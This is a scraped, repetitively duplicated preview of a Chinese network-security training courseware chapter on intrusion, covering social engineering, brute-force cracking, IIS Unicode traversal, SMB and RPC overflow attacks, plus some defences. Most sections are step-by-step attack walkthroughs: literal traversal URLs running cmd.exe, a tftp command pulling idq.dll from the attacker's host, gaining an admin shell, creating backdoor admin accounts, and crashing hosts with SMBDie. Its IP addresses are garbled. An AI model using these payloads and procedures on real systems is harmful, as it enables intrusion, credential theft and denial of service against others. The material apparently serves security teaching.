【培訓課件】計算機網(wǎng)絡安全教程_第1頁
【培訓課件】計算機網(wǎng)絡安全教程_第2頁
【培訓課件】計算機網(wǎng)絡安全教程_第3頁
【培訓課件】計算機網(wǎng)絡安全教程_第4頁
【培訓課件】計算機網(wǎng)絡安全教程_第5頁
已閱讀5頁,還剩297頁未讀 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)

文檔簡介

計算機網(wǎng)絡安全教程計算機網(wǎng)絡安全教程第五章網(wǎng)絡入侵

5.1物理攻擊與防范5.2

暴力攻擊5.3Unicode漏洞專題5.4社會工程學攻擊5

5.5緩沖區(qū)溢出攻擊5.6

拒絕服務攻擊5.7分布式拒絕服務攻擊5.8其他漏洞攻擊

防范拒絕服務攻擊5.9第五章網(wǎng)絡入侵5.1物理攻擊與防范5.2暴力攻擊5.社會工程學攻擊5.1社交工程是使用計謀和假情報去獲得密碼和其他敏感信息的科學,研究一個站點的策略其中之一就是盡可能多的了解這個組織的個體,因此黑客不斷試圖尋找更加精妙的方法從他們希望滲透的組織那里獲得信息。社會工程學攻擊5.1社交工程是使用計謀和假情報去獲得密碼和其社會工程學攻擊舉個例子:一組高中學生曾經(jīng)想要進入一個當?shù)氐墓镜挠嬎銠C網(wǎng)絡,他們擬定了一個表格,調(diào)查看上去顯得是無害的個人信息,例如所有秘書和行政人員和他們的配偶、孩子的名字,這些從學生轉(zhuǎn)變成的黑客說這種簡單的調(diào)查是他們社會研究工作的一部分。利用這份表格這些學生能夠快速的進入系統(tǒng),因為網(wǎng)絡上的大多數(shù)人是使用寵物和他們配偶名字作為密碼。社會工程學攻擊舉個例子:一組高中學生曾經(jīng)想要進入一個當?shù)氐墓W(wǎng)絡攻擊技術(shù)-社交工程黑客們最常用的一種攻擊手段能得到使用技術(shù)手段不能得到的好處防火墻和IDS對這種攻擊不起作用需要高超的人際交往技術(shù)常用方式電話電子商務網(wǎng)絡攻擊技術(shù)-社交工程黑客們最常用的一種攻擊手段網(wǎng)絡攻擊技術(shù)-社交工程社交工程種類假冒權(quán)威假扮同情個人利益改善自我感覺不引人注意的職業(yè)獎賞網(wǎng)絡攻擊技術(shù)-社交工程社交工程種類社交工程(SocialEngineering)假冒權(quán)威黑客冒充公司的領(lǐng)導人員在大公司中,不認識所有上司的情況非常普通在Internet上,黑客可以通過郵件列表發(fā)出入侵的安全警告,并提供解決問題的指令,指令被設計成能使黑客訪問系統(tǒng)。足夠顯眼的標題和時髦的行話社交工程(SocialEngineering)假冒權(quán)威社交工程(SocialEngineering)假扮電話、電子郵件、聊天室和短消息里假扮你的熟人如果你是新來的職員,冒充你的同事同情如果一個人打電話來,講述他的困難,你不幫助他嗎?個人利益假冒來自財務部門的員工,訪問系統(tǒng)管理員社交工程(SocialEngineering)假扮社交工程(續(xù))改善自我感覺自我感覺良好的人易于被欺騙黑客進入熱情的經(jīng)理房間,表明自己是來自市場部的新員工,會得到詳細的介紹社交工程(續(xù))改善自我感覺社交工程(續(xù))不引人注意的職業(yè)來自天然氣、電力公司或者電話公司的員工請求撥號等上機操作人們會單獨把黑客放在房間里獎賞提供某種形式的獎賞會引誘人泄露信息口令比賽-贏大獎、展示創(chuàng)造性,請列出密碼社交工程(續(xù))不引人注意的職業(yè)避免受到社交工程攻擊極度警惕Donottrustanystranger即使是很友好的人懷疑一切聲稱并不代表他有權(quán)這樣做詢問他們的權(quán)限絕大多數(shù)社交工程在高度警惕下破產(chǎn)避免受到社交工程攻擊極度警惕避免受到社交工程攻擊(續(xù))驗證出處當某人電子郵件要求時,要求來電話確證對于電話里的請求,要求回電號碼并確證員工號碼或者身份證避免受到社交工程攻擊(續(xù))驗證出處避免受到社交工程攻擊(續(xù))說不對于逾越日常行為準則的要求,要拒絕要求按照正常程序和規(guī)定書面報告和授權(quán)信息用戶培訓培訓員工,提高安全意識避免受到社交工程攻擊(續(xù))說不物理攻擊與防范5.2

獲取管理員密碼1權(quán)限提升2物理攻擊與防范5.2獲取管理員密碼1權(quán)限提升2物理安全是保護一些比較重要的設備不被接觸。物理安全比較難防,因為攻擊往往來自能夠接觸到物理設備的用戶。

引言物理安全是保護一些比較重要的設備不被接觸。引言獲取管理員密碼1用戶登錄以后,所有的用戶信息都存儲在系統(tǒng)的一個進程中,這個進程是:“winlogon.exe”,WindowsLogonProcess,WindowsNT用戶登陸程序,管理用戶登錄和退出。該進程的正常路徑應是

C:\Windows\System32且是以

SYSTEM用戶運行獲取管理員密碼1用戶登錄以后,所有的用戶信息都存儲在系統(tǒng)的一獲取管理員密碼1案例5-1得到管理員密碼用戶登錄以后,所有的用戶信息都存儲在系統(tǒng)的一個進程中,這個進程是:“winlogon.exe”,可以利用程序?qū)斍暗卿浻脩舻拿艽a解碼出來,如圖5-1所示。獲取管理員密碼1案例5-1得到管理員密碼獲取管理員密碼1使用FindPass等工具可以對該進程進行解碼,然后將當前用戶的密碼顯示出來。將FindPass.exe拷貝到C盤根目錄,執(zhí)行該程序,將得到當前用戶得登錄名,如圖5-2所示。獲取管理員密碼1使用FindPass等工具可以對該進程進行解權(quán)限提升2有時候,管理員為了安全,給其他用戶建立一個普通用戶帳號,認為這樣就安全了。常用的方法:社會工程學本地溢出利用scripts目錄的可執(zhí)行權(quán)限替換系統(tǒng)服務替換admin常用程序利用autorun.infServ-U提升權(quán)限SQL帳戶密碼泄露權(quán)限提升2有時候,管理員為了安全,給其他用戶建立一個普通用戶權(quán)限提升2用普通用戶帳號登錄后,可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個具有管理員權(quán)限的用戶。權(quán)限提升2用普通用戶帳號登錄后,可以利用工具GetAdmin案例5-2普通用戶建立管理員帳號利用Hacker帳戶登錄系統(tǒng),在系統(tǒng)中執(zhí)行程序GetAdmin.exe,程序自動讀取所有用戶列表,在對話框中點擊按鈕“New”,在框中輸入要新建的管理員組的用戶名,如圖5-5所示。案例5-2普通用戶建立管理員帳號利用Hacker帳戶登錄系案例5-2普通用戶建立管理員帳號輸入一個用戶名“IAMHacker”,點擊按鈕“確定”以后,然后點擊主窗口的按鈕“OK”,出現(xiàn)添加成功的窗口,如圖5-6所示。案例5-2普通用戶建立管理員帳號輸入一個用戶名“IAMHa暴力攻擊5.3

字典文件1暴力破解操作系統(tǒng)密碼2

暴力破解郵箱密碼3暴力破解軟件密碼4暴力攻擊5.3字典文件1暴力破解操作系統(tǒng)密碼2暴力破暴力攻擊是一種發(fā)現(xiàn)密碼的嘗試,其方法是系統(tǒng)地嘗試字母、數(shù)字和符號的每種可能組合,直到發(fā)現(xiàn)一個可起作用的正確組合。攻擊者總可以通過暴力攻擊獲得密碼,但這種方法的不利之處在于,可能需要數(shù)年才能找到一個密碼。根據(jù)密碼的長度和復雜性,也許有無數(shù)個可能的組合。針對一個安全系統(tǒng)進行暴力攻擊需要大量的時間,需要極大的意志和決心。什么是暴力攻擊暴力攻擊是一種發(fā)現(xiàn)密碼的嘗試,其方法是系統(tǒng)地嘗試字母、數(shù)字和暴力攻擊暴力攻擊的一個具體例子是,一個黑客試圖使用計算機和信息去破解一個密碼。一個黑客需要破解—段單一的被用非對稱密鑰加密的信息,為了破解這種算法,一個黑客需要求助于非常精密復雜的方法,它使用120個工作站,兩個超級計算機利用從三個主要的研究中心獲得的信息,即使擁有這種配備,它也將花掉八天的時間去破解加密算法,實際上破解加密過程八天已是非常短暫的時間了。暴力攻擊暴力攻擊的一個具體例子是,一個黑客試圖使用計算機和信暴力破解兩種方式的破解在線破解在線登錄目標主機,通過程序循環(huán)輸入密碼嘗試正確的密碼輸入可能會在日志里留下記錄,很容易被探測出來離線破解取得目標主機的密碼文件,然后在本地破解花費時間較長,一般時攻擊系統(tǒng)取得一定權(quán)限后使用暴力破解兩種方式的破解在線破解Windows系統(tǒng)使用NAT(NetBIOSAuditingTool)進行探測在NetBIOS開放138,139端口提供SMB服務,允許用戶遠程訪問文件系統(tǒng)Windows2000缺省共享所有驅(qū)動器和admin$訪問文件系統(tǒng)時需要用戶身份驗證NAT可以猜測用戶口令,從而取得目標機器的控制權(quán)NAT用法:nat[-ofilename][-uuserlist][-ppasslist]address在線破解Windows系統(tǒng)在線破解Linux系統(tǒng)一般在telnet三次錯誤后,系統(tǒng)會斷開連接在線破解的軟件較少在線破解Linux系統(tǒng)離線破解得到用戶的密碼文件,然后在本地破解Windows系統(tǒng)用戶密碼存放在%systemroot%\system32\config\和%systemroot%\repair\中得到這個文件后可以使用L0phtcrack進行本地破解離線破解得到用戶的密碼文件,然后在本地破解離線破解Linux系統(tǒng)用戶名和密碼存儲在/etc/passwd中會被很多用戶看到該文件為了加強安全性,將密碼存儲在etc/shadow中只能由root存取著名的破解工具:JohntheRipper因為Linux在線破解困難,所以離線破解比較常見很多管理員現(xiàn)在沒有使用shadow文件離線破解Linux系統(tǒng)暴力破解手段暴力破解的手段字典攻擊強行攻擊組合攻擊暴力破解手段暴力破解的手段字典攻擊字典:一些單詞或者字母和數(shù)字的組合使用字典的好處比較快速的得到用戶密碼,只需要在字典中進行查找字典攻擊字典:一些單詞或者字母和數(shù)字的組合字典攻擊前提前提條件絕大多數(shù)用戶選擇密碼總是有一定規(guī)律的姓名:自己、父母、愛人、孩子生日電話號碼,身份證號碼,學號英文單詞上述組合打開錢包,我就能知道你的密碼設計一個好的字典是非常有必要的字典攻擊前提前提條件字典攻擊防御防止字典攻擊的方法使用帶有特殊字符的密碼密碼不是有規(guī)律的英語單詞字典攻擊防御防止字典攻擊的方法強行攻擊在選定的字母或者數(shù)字序列里生成所有包含這些字母的口令密碼生成器,只要用戶指定字母和數(shù)字和密碼的位數(shù),就能生成字典特點密碼較多,所需時間較長分布式攻擊多臺計算機共同運算適用于對用戶信息不夠了解的情況強行攻擊在選定的字母或者數(shù)字序列里生成所有包含這些字母的口令強行攻擊防御對策使用長的密碼攻擊者需要構(gòu)造出很大的字典,加大攻擊難度經(jīng)常更換密碼需要在方便和安全中作出抉擇強行攻擊防御對策組合攻擊綜合前兩種攻擊的優(yōu)點字典攻擊:速度較快強行攻擊:發(fā)現(xiàn)所有的口令根據(jù)掌握的用戶的不同信息,進行口令組合姓名縮寫和生日的組合在字母組合后面加上一些數(shù)字攻擊速度破解口令數(shù)量字典攻擊快所有字典單詞強行攻擊慢所有口令組合攻擊中等以字典為基礎的單詞組合攻擊綜合前兩種攻擊的優(yōu)點攻擊速度破解口令數(shù)量三種攻擊的比較攻擊速度破解口令數(shù)量字典攻擊快所有字典單詞強行攻擊慢所有口令組合攻擊中等以字典為基礎的單詞三種攻擊的比較攻擊速度破解口令數(shù)量字典攻擊字典文件1一次字典攻擊能否成功,很大因素上決定與字典文件。一個好的字典文件可以高效快速的得到系統(tǒng)的密碼。攻擊不同的公司、不通地域的計算機,可以根據(jù)公司管理員的姓氏以及家人的生日,可以作為字典文件的一部分,公司以及部門的簡稱一般也可以作為字典文件的一部分,這樣可以大大的提高破解效率。字典文件1一次字典攻擊能否成功,很大因素上決定與字典文件。一字典文件1一個字典文件本身就是一個標準的文本文件,其中的每一行就代表一個可能的密碼。目前有很多工具軟件專門來創(chuàng)建字典文件,圖5-8是一個簡單的字典文件。字典文件1一個字典文件本身就是一個標準的文本文件,其中的每一暴力破解操作系統(tǒng)密碼2字典文件為暴力破解提供了一條捷徑,程序首先通過掃描得到系統(tǒng)的用戶,然后利用字典中每一個密碼來登錄系統(tǒng),看是否成功,如果成功則將密碼顯示暴力破解操作系統(tǒng)密碼2字典文件為暴力破解提供了一條捷徑,程序暴力破解操作系統(tǒng)密碼2案例5-3暴力破解操作系統(tǒng)密碼比如使用圖5-8所示的字典文件,利用上一章介紹的工具軟件GetNTUser依然可以將管理員密碼破解出來,如圖5-9所示。暴力破解操作系統(tǒng)密碼2案例5-3暴力破解操作系統(tǒng)密碼暴力破解郵箱密碼3郵箱的密碼一般需要設置到八位以上,否則七位以下的密碼容易被破解。尤其七位全部是數(shù)字,更容易被破解。案例5-4電子郵箱暴力破解破解電子郵箱密碼,一個比較著名的工具軟件是:黑雨——POP3郵箱密碼暴力破解器,比較穩(wěn)定的版本是2.3.1,主界面如圖5-10所示。暴力破解郵箱密碼3郵箱的密碼一般需要設置到八位以上,否則七位暴力破解軟件密碼4目前許多軟件都具有加密的功能,比如Office文檔、Winzip文檔和Winrar文檔等等。這些文檔密碼可以有效的防止文檔被他人使用和閱讀。但是如果密碼位數(shù)不夠長的話,同樣容易被破解。案例5-5Office文檔暴力破解暴力破解軟件密碼4目前許多軟件都具有加密的功能,比如Offi修改權(quán)限密碼在對話框中選擇選項卡“安全性”,在打開權(quán)限密碼和修改權(quán)限密碼的兩個文本框中都輸入“999”,如圖5-12所示。修改權(quán)限密碼在對話框中選擇選項卡“安全性”,在打開權(quán)限密碼和輸入密碼保存并關(guān)閉該文檔,然后再打開,就需要輸入密碼了,如圖5-13所示。輸入密碼保存并關(guān)閉該文檔,然后再打開,就需要輸入密碼了,如圖破解Word文檔密碼該密碼是三位的,使用工具軟件,AdvancedOfficeXPPasswordRecovery可以快速破解Word文檔密碼,主界面如圖5-14所示。破解Word文檔密碼該密碼是三位的,使用工具軟件,Advan破解Word文檔密碼點擊工具欄按鈕“OpenFile”,打開剛才建立的Word文檔,程序打開成功后會在LogWindow中顯示成功打開的消息,如圖5-15所示。破解Word文檔密碼點擊工具欄按鈕“OpenFile”,打破解Word文檔密碼設置密碼長度最短是一位,最長是三位,點擊工具欄開始的圖標,開始破解密碼,大約兩秒鐘后,密碼被破解了,如圖5-16所示。破解Word文檔密碼設置密碼長度最短是一位,最長是三位,點擊Unicode漏洞專題5.4Unicode漏洞的檢測方法1使用Unicode漏洞刪除主頁2Unicode漏洞專題5.4Unicode漏洞的檢測方法1引言通過打操作系統(tǒng)的補丁程序,就可以消除漏洞。只要是針對漏洞進行攻擊的案例都依賴于操作系統(tǒng)是否打了相關(guān)的補丁。Unicode漏洞是2000-10-17發(fā)布的,受影響的版本:MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0消除該漏洞的方式是安裝操作系統(tǒng)的補丁,只要安裝了SP1以后,該漏洞就不存在了。微軟IIS4.0和5.0都存在利用擴展UNICODE字符取代"/"和"\"而能利用"../"目錄遍歷的漏洞。引言通過打操作系統(tǒng)的補丁程序,就可以消除漏洞。只要是針對漏洞Unicode漏洞Unicode漏洞是2000-10-17發(fā)布的,受影響的版本:MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0消除該漏洞的方式是安裝操作系統(tǒng)的補丁,只要安裝了SP1以后,該漏洞就不存在了。微軟IIS4.0和5.0都存在利用擴展UNICODE字符取代"/"和"\"而能利用"../"目錄遍歷的漏洞。Unicode漏洞Unicode漏洞是2000-10-17發(fā)Unicode漏洞的檢測方法1使用掃描工具來檢測Unicode漏洞是否存在,使用上一章介紹的X-Scan來對目標系統(tǒng)進行掃描,目標主機IP為:09,Unicode漏洞屬于IIS漏洞,所以這里只掃描IIS漏洞就可以了,X-Scan設置如圖5-17所示。Unicode漏洞的檢測方法1使用掃描工具來檢測UnicodUnicode漏洞的檢測方法1將主機添加到目標地址,掃描結(jié)果如圖5-18所示。Unicode漏洞的檢測方法1將主機添加到目標地址,掃描結(jié)果Unicode漏洞的檢測方法1可以看出,存在許多系統(tǒng)的漏洞。只要是/scripts開頭的漏洞都是Unicode漏洞。比如:/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir其中/scripts目錄是IIS提供的可以執(zhí)行命令的一個有執(zhí)行程序權(quán)限的一個目錄,在IIS中的位置如圖5-19所示。Unicode漏洞的檢測方法1可以看出,存在許多系統(tǒng)的漏洞。Unicode漏洞的檢測方法1scripts目錄一般系統(tǒng)盤根目錄下的Inetpub目錄下,如圖5-20所示。Unicode漏洞的檢測方法1scripts目錄一般系統(tǒng)盤根Unicode漏洞的檢測方法1在Windows的目錄結(jié)構(gòu)中,可以使用兩個點和一個斜線“../”來訪問上一級目錄,在瀏覽器中利用“scripts/../../”可以訪問到系統(tǒng)盤根目錄,訪問“scripts/../../winnt/system32”就訪問到系統(tǒng)的系統(tǒng)目錄了,在system32目錄下包含許多重要的系統(tǒng)文件,比如cmd.exe文件,可以利用該文件新建用戶,刪除文件等操作。Unicode漏洞的檢測方法1在Windows的目錄結(jié)構(gòu)中,Unicode漏洞的檢測方法1瀏覽器地址欄中禁用符號“../”,但是可以使用符號“/”的Unicode的編碼。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼。這條語句是執(zhí)行dir命令列出目錄結(jié)構(gòu)。Unicode漏洞的檢測方法1瀏覽器地址欄中禁用符號“../Unicode漏洞此漏洞從中文IIS4.0+SP6開始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,臺灣繁體中文也同樣存在這樣的漏洞。在NT4中/編碼為“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。Unicode漏洞此漏洞從中文IIS4.0+SP6開始,還影Unicode漏洞但從國外某些站點得來的資料顯示,還有以下的編碼可以實現(xiàn)對該漏洞的檢測,該編碼存在于日文版、韓文版等操作系統(tǒng)。%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%afUnicode漏洞但從國外某些站點得來的資料顯示,還有以下的Unicode漏洞利用該漏洞讀取出計算機上目錄列表,比如讀取C盤的目錄,只要在瀏覽器中輸入“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\”Unicode漏洞利用該漏洞讀取出計算機上目錄列表,比如讀取利用Unicode漏洞讀取系統(tǒng)盤目錄利用Unicode漏洞讀取系統(tǒng)盤目錄利用Unicode漏洞讀取系統(tǒng)盤目錄利用語句得到對方計算機上裝了幾個操作系統(tǒng)以及操作系統(tǒng)的類型,只要讀取C盤下的boot.ini文件就可以了。使用的語句是:09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:\boot.ini執(zhí)行的結(jié)果如圖5-22所示。利用Unicode漏洞讀取系統(tǒng)盤目錄利用語句得到對方計算機上使用Unicode漏洞刪除主2使用Unicode漏洞刪除主2使用Unicode漏洞刪除主2使用Unicode漏洞刪除主2拷貝文件為了是使用方便,利用語句將cmd.exe文件拷貝到scripts目錄,并改名為c.exe,使用的語句是:09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe程序執(zhí)行結(jié)果如圖5-24所示。拷貝文件為了是使用方便,利用語句將cmd.exe文件拷貝到s查看C盤的目錄以后使用cmd.exe命令就方便了,比如查看C盤的目錄,使用的語句就可以簡化為:09/scripts/c.exe?/c+dir+c:\執(zhí)行的結(jié)果如圖5-25所示。查看C盤的目錄以后使用cmd.exe命令就方便了,比如查看C利用Unicode漏洞入侵系統(tǒng)在地址欄上執(zhí)行命令,用戶的權(quán)限比較低,像net等系統(tǒng)管理指令不能執(zhí)行。利用Unicode可以入侵對方的系統(tǒng),并得到管理員權(quán)限。首先需要向?qū)Ψ椒掌魃蟼饕恍┪募?。入侵的第一步,建立tftp服務器,向?qū)Ψ降膕cripts文件夾傳幾個文件。利用Unicode漏洞入侵系統(tǒng)在地址欄上執(zhí)行命令,用戶的權(quán)限利用Unicode漏洞入侵系統(tǒng)需要上傳一個名為“idq.dll”的文件,為了上傳這個文件,首先在本地計算機上搭建一個TFTP服務器,普通文件傳輸協(xié)議TFTP(TextFileTransmissionProtocol)一般用來傳輸單個文件。使用工具軟件tftpd32.exe建立服務器。將idq.dll和tftpd32.exe放在本地的同一目錄下,執(zhí)行tftpd32.exe程序,主界面如圖5-26所示。利用Unicode漏洞入侵系統(tǒng)需要上傳一個名為“idq.dl利用Unicode漏洞入侵系統(tǒng)這樣在本地的TFTP的服務器就建立好了,保留這個窗口,通過該服務器向?qū)Ψ絺鬟fidq.dll文件。在瀏覽器中執(zhí)行命令:“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”,命令其實是“tftp–i10getidq.dll”意思是從10服務器上獲取idq.dll文件,執(zhí)行成功的界面如圖5-27所示。利用Unicode漏洞入侵系統(tǒng)這樣在本地的TFTP的服務器就上載文件上載文件查看scripts目錄上傳完畢后可以查看一下scripts目錄,是否真的上傳成功了。如圖5-28所示。查看scripts目錄上傳完畢后可以查看一下scripts目入侵對方主機

說明已經(jīng)成功的在scripts目錄中上傳了一個idq.dll文件,第二步:下面使用工具軟件ispc.exe入侵對方系統(tǒng)拷貝ispc.exe文件到本地計算機的C盤根目錄,在DOS命令行下執(zhí)行命令:“ispc.exe09/scripts/idq.dll”,連接成功后就直接進入了對方的DOS命令行下,而且具有管理員權(quán)限,入侵的過程5-29所示。入侵對方主機說明已經(jīng)成功的在scripts目錄中上傳了一個建立用戶

可以在對方計算機上做管理員可以做的一切事情,比如添加用戶,建立一個用戶名為“Hacker123”,密碼也是“Hacker123”的用戶,如圖5-30所示。建立用戶可以在對方計算機上做管理員可以做的一切事情,比如添其他漏洞攻擊5.5

利用打印漏洞1SMB致命攻擊2其他漏洞攻擊5.5利用打印漏洞1SMB致命攻擊2

利用打印漏洞利用打印漏洞可以在目標的計算機上添加一個具有管理員權(quán)限的用戶。經(jīng)過測試,該漏洞在SP2、SP3以及SP4版本上依然存在,但是不能保證100%入侵成功。使用工具軟件:cniis.exe,使用的語法格式是:“cniis090”,第一個參數(shù)是目標的IP地址,第二參數(shù)是目標操作系統(tǒng)的補丁號,因為09沒有打補丁,這里就是0。拷貝cniis.exe文件到C盤根目錄,執(zhí)行程序如圖5-31所示。1利用打印漏洞利用打印漏洞可以在目標的計算機上添加一個具有管SMB致命攻擊SMB(SessionMessageBlock,會話消息塊協(xié)議)又叫做NetBIOS或LanManager協(xié)議,用于不同計算機之間文件、打印機、串口和通訊的共享和用于Windows平臺上提供磁盤和打印機的共享。SMB協(xié)議版本有很多種,在Windows98、WindowsNT、Windows2000和XP使用的是NTLM0.12版本。2SMB致命攻擊SMB(SessionMessageBloSMB致命攻擊利用該協(xié)議可以進行各方面的攻擊,比如可以抓取其他用戶訪問自己計算機共享目錄的SMB會話包,然后利用SMB會話包登錄對方的計算機。下面介紹利用SMB協(xié)議讓對方操作系統(tǒng)系統(tǒng)重新啟動或者藍屏。2SMB致命攻擊利用該協(xié)議可以進行各方面的攻擊,比如可以抓取其致命攻擊使用的工具軟件是:SMBDieV1.0,該軟件對打了SP3、SP4的計算機依然有效,必須打?qū)iT的SMB補丁,軟件的主界面如圖5-32所示。致命攻擊使用的工具軟件是:SMBDieV1.0,該軟件對打致命攻擊攻擊的時候,需要兩個參數(shù):對方的IP地址和對方的機器名,窗口中分別輸入這兩項,如圖5-33所示。致命攻擊攻擊的時候,需要兩個參數(shù):對方的IP地址和對方的機器致命攻擊然后再點按鈕“Kill”,如果參數(shù)輸入沒有錯誤的話,對方計算機立刻重啟或藍屏,命中率幾乎100%,被攻擊的計算機藍屏界面如圖5-34所示。致命攻擊然后再點按鈕“Kill”,如果參數(shù)輸入沒有錯誤的話,緩沖區(qū)溢出攻擊5.6RPC漏洞溢出1利用IIS溢出進行攻擊2

利用WebDav遠程溢出3緩沖區(qū)溢出攻擊5.6RPC漏洞溢出1利用IIS溢出進行攻引言目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊。當目標操作系統(tǒng)收到了超過了它的最大能接收的信息量的時候,將發(fā)生緩沖區(qū)溢出。這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出,然后覆蓋了實際的程序數(shù)據(jù),緩沖區(qū)溢出使目標系統(tǒng)的程序被修改,經(jīng)過這種修改的結(jié)果使在系統(tǒng)上產(chǎn)生一個后門。這項攻擊對技術(shù)要求比較高,但是攻擊的過程卻非常簡單。緩沖區(qū)溢出原理很簡單,比如程序:引言目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊。當目標操作系引言voidfunction(char*szPara1){ charbuff[16]; strcpy(buffer,szPara1);}程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中,只要szPara1的長度大于16,就會造成緩沖區(qū)溢出。存在strcpy函數(shù)這樣問題的C語言函數(shù)還有:strcat()、gets()、scanf()等。引言voidfunction(char*szPara1引言voidfunction(char*szPara1){ charbuff[16]; strcpy(buffer,szPara1);}程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中,只要szPara1的長度大于16,就會造成緩沖區(qū)溢出。存在strcpy函數(shù)這樣問題的C語言函數(shù)還有:strcat()、gets()、scanf()等。引言voidfunction(char*szPara1緩存區(qū)溢出歷史緩存區(qū)溢出歷史1988年的Morris蠕蟲病毒,成功攻擊了6000多臺機器:利用UNIX服務finger中的緩沖區(qū)溢出漏洞來獲得訪問權(quán)限,得到一個shell1996年前后,開始出現(xiàn)大量的BufferOverflow攻擊,因此引起人們的廣泛關(guān)注源碼開放的操作系統(tǒng)首當其沖隨后,Windows系統(tǒng)下的BufferOverflows也相繼被發(fā)掘出來已經(jīng)有一些非常經(jīng)典細致的文章來介紹與Bufferoverflows有關(guān)的技術(shù)緩存區(qū)溢出歷史緩存區(qū)溢出歷史緩沖區(qū)溢出的基本介紹基本的思想通過修改某些內(nèi)存區(qū)域,把一段惡意代碼存儲到一個buffer中,并且使這個buffer被溢出,以便當前進程被非法利用(執(zhí)行這段惡意的代碼)緩沖區(qū)溢出的基本介紹基本的思想“SQLSlammer”蠕蟲王的發(fā)作原理,就是利用未及時更新補丁的MSSQLServer數(shù)據(jù)庫緩沖溢出漏洞。采用不正確的方式將數(shù)據(jù)發(fā)到MSSqlServer的監(jiān)聽端口,這個錯誤可以引起緩沖溢出攻擊。出現(xiàn)的MSBLAST病毒正是利用了微軟關(guān)于RPC接口中遠程任意可執(zhí)行代碼漏洞,“中招”的機器會反復重啟,或者拷貝、粘貼功能不工作等現(xiàn)象。僅去年緩沖區(qū)溢出就占使CERT/CC提出建議的所有重大安全性錯誤的百分之五十以上。并且數(shù)據(jù)顯示這一問題正在擴大,而不是在縮減。緩沖區(qū)溢出的實例“SQLSlammer”蠕蟲王的發(fā)作原理,就是利用未及時更緩沖區(qū)溢出的保護方法編寫正確的代碼最簡單的方法就是用grep來搜索源代碼中容易產(chǎn)生漏洞的庫的調(diào)用為了對付這些問題,人們已經(jīng)開發(fā)了一些高級的查錯工具,如faultinjection等。這些工具的目的在于通過人為隨機地產(chǎn)生一些緩沖區(qū)溢出來尋找代碼的安全漏洞。緩沖區(qū)溢出的保護方法編寫正確的代碼緩沖區(qū)溢出的保護方法非執(zhí)行的緩沖區(qū)通過使被攻擊程序的數(shù)據(jù)段地址空間不可執(zhí)行,從而使得攻擊者不可能執(zhí)行被植入被攻擊程序輸入緩沖區(qū)的代碼,這種技術(shù)被稱為非執(zhí)行的緩沖區(qū)技術(shù)。事實上,很多老的Unix系統(tǒng)都是這樣設計的,但是近來的Unix和MSWindows系統(tǒng)為實現(xiàn)更好的性能和功能,往往在數(shù)據(jù)段中動態(tài)地放人可執(zhí)行的代碼。所以為了保持程序的兼容性不可能使得所有程序的數(shù)據(jù)段不可執(zhí)行。但是我們可以設定堆棧數(shù)據(jù)段不可執(zhí)行,這樣就可以最大限度地保證了程序的兼容性。緩沖區(qū)溢出的保護方法非執(zhí)行的緩沖區(qū)緩沖區(qū)溢出的保護方法數(shù)組邊界檢查程序指針完整性檢查緩沖區(qū)溢出的保護方法數(shù)組邊界檢查RPC漏洞溢出遠程過程調(diào)用RPC(RemoteProcedureCall),是操作系統(tǒng)的一種消息傳遞功能,允許應用程序呼叫網(wǎng)絡上的計算機。當系統(tǒng)啟動的時候,自動加載RPC服務??梢栽诜樟斜碇锌吹较到y(tǒng)的RPC服務,如圖5-35所示。1RPC漏洞溢出遠程過程調(diào)用RPC(RemoteProce利用RPC漏洞建立超級用戶

RPC溢出漏洞,對SP4也適用,必須打?qū)S醚a丁。利用工具scanms.exe文件檢測RPC漏洞,該工具是ISS安全公司2003年7月30日發(fā)布的,運行在命令行下用來檢測指定IP地址范圍內(nèi)機器是否已經(jīng)安裝了“DCOMRPC接口遠程緩沖區(qū)溢出漏洞(823980-MS03-026)”補丁程序。如果沒有安裝補丁程序,該IP地址就會顯示出“[VULN]”。首先拷貝該文件到C盤根目錄,現(xiàn)在要檢查地址段09到10的主機,執(zhí)行命令“scanms.exe09-10”,檢查過程如圖5-36所示。利用RPC漏洞建立超級用戶RPC溢出漏洞,對SP4也適用,檢查緩沖區(qū)溢出漏洞檢查緩沖區(qū)溢出漏洞利用緩沖區(qū)溢出漏洞攻擊利用工具軟件attack.exe對09進行攻擊。攻擊的結(jié)果將在對方計算機上建立一個具有管理員權(quán)限的用戶,并終止了對方的RPC服務。新建用戶的用戶名和密碼都是qing10,這樣就可以登錄對方計算機了,RPC服務停止操作系統(tǒng)將有許多功能不能使用,非常容易被管理員發(fā)現(xiàn),使用工具軟件OpenRpcSs.exe來給對方重啟RPC服務。攻擊的全過程如圖5-37所示。利用緩沖區(qū)溢出漏洞攻擊利用工具軟件attack.exe對17攻擊的全過程

